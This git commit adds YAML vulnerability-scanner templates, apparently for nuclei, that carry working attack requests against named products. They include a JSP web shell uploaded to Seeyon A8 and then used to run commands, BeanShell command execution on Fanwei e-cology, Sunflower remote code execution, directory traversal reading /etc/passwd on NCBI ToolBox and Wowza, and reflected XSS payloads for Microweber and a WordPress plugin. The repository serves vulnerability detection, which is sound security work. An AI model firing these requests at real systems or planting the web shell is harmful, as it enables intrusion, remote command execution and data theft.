sullo 2022-02-28 17:31:45 -05:00
commit c9a211b19c
11 changed files with 306 additions and 0 deletions

View File

@ -1,14 +1,23 @@
cnvd/2019/CNVD-2019-19299.yaml
cnvd/2019/CNVD-2019-32204.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cnvd/2022/CNVD-2022-03672.yaml
cves/2017/CVE-2017-18598.yaml
cves/2018/CVE-2018-16716.yaml
cves/2018/CVE-2018-19365.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/casdoor-login.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/microweber-detect.yaml
technologies/snipeit-panel.yaml
vulnerabilities/other/microweber-xss.yaml
vulnerabilities/wordpress/wp-adaptive-xss.yaml

View File

@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and

View File

@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and

View File

@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: casdoor-login
info:
name: Casdoor Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"Casdoor"
tags: panel,casdoor
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Casdoor</title>"
- type: status
status:
- 200

View File

@ -7605,6 +7605,11 @@ requests:
words:
- var reachclientproductname = "skype for business web 应用"
- type: word
name: microweber
words:
- '"generator" content="Microweber" />'
- type: word
name: mihalism-multi-host
words:

View File

@ -0,0 +1,26 @@
id: microweber-detect
info:
name: Microweber Detect
author: princechaddha
severity: info
reference: https://github.com/microweber/microweber
metadata:
shodan-query: 'http.favicon.hash:780351152'
tags: tech,microweber,oss
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"generator" content="Microweber" />'
- type: status
status:
- 200

View File

@ -0,0 +1,34 @@
id: microweber-xss
info:
name: Microweber XSS
author: gy741
severity: medium
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://github.com/microweber/microweber/issues/809
- https://github.com/microweber/microweber
metadata:
shodan-query: 'http.favicon.hash:780351152'
tags: microweber,xss,oss
requests:
- method: GET
path:
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" 0="filetype=images"'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: wp-adaptive-xss
info:
name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
- https://plugins.trac.wordpress.org/changeset/2655683
tags: wordpress,xss,wp-plugin,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
matchers-condition: and
matchers:
- type: word
words:
- '<img/src/onerror=alert(document.domain)>'
- '<td>Image</td>'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200